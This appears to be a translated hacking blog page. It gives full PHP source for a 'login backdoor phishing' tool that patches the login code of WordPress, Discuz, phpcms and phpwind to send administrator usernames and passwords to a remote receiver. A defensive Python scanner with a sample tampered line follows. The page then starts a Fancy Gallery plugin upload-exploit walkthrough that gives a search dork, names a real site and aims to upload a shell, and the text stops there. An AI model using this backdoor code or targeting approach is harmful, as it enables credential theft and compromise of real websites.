WordPress vulnerabilities

Login backdoor phishing program V2.0

Compared with version 1.0, this version adds MySQL storage support on the receiving end.

The automatic backdoor-insertion end adds support for dz and WordPress.

Code:

```php
<?php
/**
+-----------------------------------------------------------------
* Login backdoor phishing program V2.0
+-----------------------------------------------------------------
* Function overview:
* This program automatically inserts a phishing backdoor according to the selected CMS or BBS system
* Support for the mainstream PHP CMS and BBS systems will be completed later
* This program is for study and reference only; do not use it for illegal purposes, and keep the copyright notice
+-----------------------------------------------------------------
* Author: Return Blogs: www.creturn.com email:master@creturn.com
+-----------------------------------------------------------------
**/
error_reporting(0);
$rHost = 'http://192.168.1.199/MyProject/server/sever.php'; //define the receiving address
$pUname = 'uname'; //username parameter received by the remote end
$pPwd = 'pwd'; //define the password parameter received by the remote end
$error = '';
/**
* Insert code
*/
function inSertPwdDoor($cmsCode,$relPath){
global $rHost,$pUname,$pPwd;
//build the username and password signature
if($cmsCode['mothed'] == 'post'){
$rHostPath = $rHost.'?'.$pUname.'=$_POST['.$cmsCode['uname'].']&'.$pPwd.'=$_POST['.$cmsCode['pwd'].']';
}else{
$rHostPath = $rHost.'?'.$pUname.'=$_GET['.$cmsCode['uname'].']&'.$pPwd.'=$_GET['.$cmsCode['pwd'].']';
}
//get the code to insert
$keyword = $cmsCode['keyword'];
$replace = 'file_get_contents("'.$rHostPath.'");'.$cmsCode['bedeck'].$keyword;
$loginPageContent = file_get_contents($relPath);
$loginPageContent = str_replace($keyword, $replace, $loginPageContent);
if(file_put_contents($relPath, $loginPageContent)){
tipAmessage('成功插入!');
}else{
tipAmessage('插入失败!');
}
}
function tipAmessage($msg){
global $error;
$error = $msg;
}
/**
* Login signature codes and file paths for each CMS
*
* $code description:
* $code['keyword'] keyword, i.e. the signature string at which the code is inserted
* $code['bedeck'] decorator used to fix up the appearance of the inserted code
* $code['uname'] username variable name
* $code['pwd'] password variable name
* $code['mothed'] password submission method: POST or GET
* $code['path'] login file path
* Notes:
* Since different programs may have more than one login method (normal login,
* ajax, or third-party login), the keyword for the login point must be chosen accurately
*/
function switchCms($cmsName){
$code = array();
switch ($cmsName) {
case 'phpcmsV9':
$code['path'] = 'phpcms/modules/admin/index.php';
$code['keyword'] = "showmessage(L('login_success'),'?m=admin&c=index');";
$code['bedeck'] = "nttt";
$code['uname'] = 'username';
$code['pwd'] = 'password';
$code['mothed'] = 'post';
break;
case 'dedecms':
break;
case 'dz':
$code['path'] = 'source/class/class_admincp.php';
$code['keyword'] = "$cpgroupid = DB::result_first";
$code['bedeck'] = "nttttt";
$code['uname'] = 'admin_username';
$code['pwd'] = 'admin_password';
$code['mothed'] = 'post';
break;
case 'phpwind':
$code['path'] = 'admin/admincp.php';
$code['keyword'] = "$REQUEST_URI = trim($REQUEST_URI,'?#');";
$code['bedeck'] = "nt";
$code['uname'] = 'admin_name';
$code['pwd'] = 'admin_pwd';
$code['mothed'] = 'post';
break;
case 'wordpress':
$code['path'] = 'wp-includes/user.php';
$code['keyword'] = "$user = new WP_User($userdata->ID);";
$code['bedeck'] = "nt";
$code['uname'] = 'log';
$code['pwd'] = 'pwd';
$code['mothed'] = 'post';
break;
default:
;
break;
}
return $code;
}
if(isset($_POST['creack']) && $_POST['creack'] != ''){
$webRoot = $_SERVER['DOCUMENT_ROOT']; //current directory
$dir = isset($_POST['dir']) && !empty($_POST['dir']) ? trim($_POST['dir']) : '';
$cms = isset($_POST['cms']) && !empty($_POST['cms']) ? trim($_POST['cms']) : '';
$cmsCode = switchCms($_POST['cms']);
if(empty($cmsCode)){
$error = '没找到可用CMS或者BBS';
}else{
$relPath = $webRoot.$dir.$cmsCode['path'];
if(file_exists($relPath)){
inSertPwdDoor($cmsCode,$relPath);
}else{
tipAmessage('没有找到该文件路径:'.$relPath);
}
}
}
```
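The program above plants a `file_get_contents("<receiver>?...=$_POST[...]&...=$_POST[...]")` call directly in front of a known login-success statement in the CMS login file. As a defender-side check added here (not part of the original program), the scanner below flags exactly that pattern in PHP source and reports which of the login anchors from `switchCms` it sits next to; the sample file contents and the receiver IP are constructed.

```python
import re

# Login-success anchors the installer prepends its exfiltration call to (from the page's switchCms table).
LOGIN_ANCHORS = {
    "wordpress": "$user = new WP_User($userdata->ID);",
    "phpcmsV9": "showmessage(L('login_success'),'?m=admin&c=index');",
    "dz": "$cpgroupid = DB::result_first",
    "phpwind": "$REQUEST_URI = trim($REQUEST_URI,'?#');",
}

# file_get_contents("http(s)://...$_POST[...]..." ) ; with request parameters interpolated into the URL.
EXFIL_RE = re.compile(
    r"""file_get_contents\(\s*(["'])(https?://[^"']*\$_(?:POST|GET)\[[^\]]*\][^"']*)\1\s*\)\s*;"""
)


def find_injected_exfil(php_source: str):
    """Return a list of (line_no, url, anchor_name_or_None) for every exfiltration call found.

    anchor_name is set when a known login anchor appears on the same line or within
    the next three lines (the installer's 'bedeck' whitespace may put it on a later line).
    """
    findings = []
    lines = php_source.splitlines()
    for idx, line in enumerate(lines, 1):
        m = EXFIL_RE.search(line)
        if not m:
            continue
        window = "\n".join(lines[idx - 1:idx + 3])
        anchor = next((name for name, kw in LOGIN_ANCHORS.items() if kw in window), None)
        findings.append((idx, m.group(2), anchor))
    return findings


# Constructed sample: a stand-in for the relevant lines of wp-includes/user.php, clean and tampered.
CLEAN_SAMPLE = (
    "<?php\n"
    "function wp_signon( $credentials = array(), $secure_cookie = '' ) {\n"
    "\t$user = new WP_User($userdata->ID);\n"
    "\treturn $user;\n"
    "}\n"
)
INJECTED_SAMPLE = CLEAN_SAMPLE.replace(
    "\t$user = new WP_User($userdata->ID);",
    '\tfile_get_contents("http://203.0.113.10/server/sever.php?uname=$_POST[log]&pwd=$_POST[pwd]");\n'
    "\t$user = new WP_User($userdata->ID);",
)

if __name__ == "__main__":
    for label, src in (("clean", CLEAN_SAMPLE), ("tampered", INJECTED_SAMPLE)):
        print(label, find_injected_exfil(src))
```

Run it against a real install by reading each path listed in `switchCms` and passing the file contents to `find_injected_exfil`; a hit with a non-`None` anchor is the signature of this particular tool.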

Wordpress Fancy Gallery Plugin 1.2.4 vulnerability exploitation

Out of habit, before going to bed I went to http://www.exploit-db.com/ to see whether any new vulnerabilities had come out,

and happened to see an upload vulnerability in Wordpress Fancy Gallery Plugin 1.2.4.

Well, actually if it had been an injection vulnerability I wouldn't have bothered looking; with an upload vulnerability you can usually upload your own shell backdoor directly, which saves effort.

First find a vulnerable site that has the fancy gallery plugin, Google keyword: inurl:/wp-content/plugins/radykal-fancy-gallery/

I clicked into one at random and had a look: http://progressivepulse.com turned out to really have this plugin, and also had a directory listing vulnerability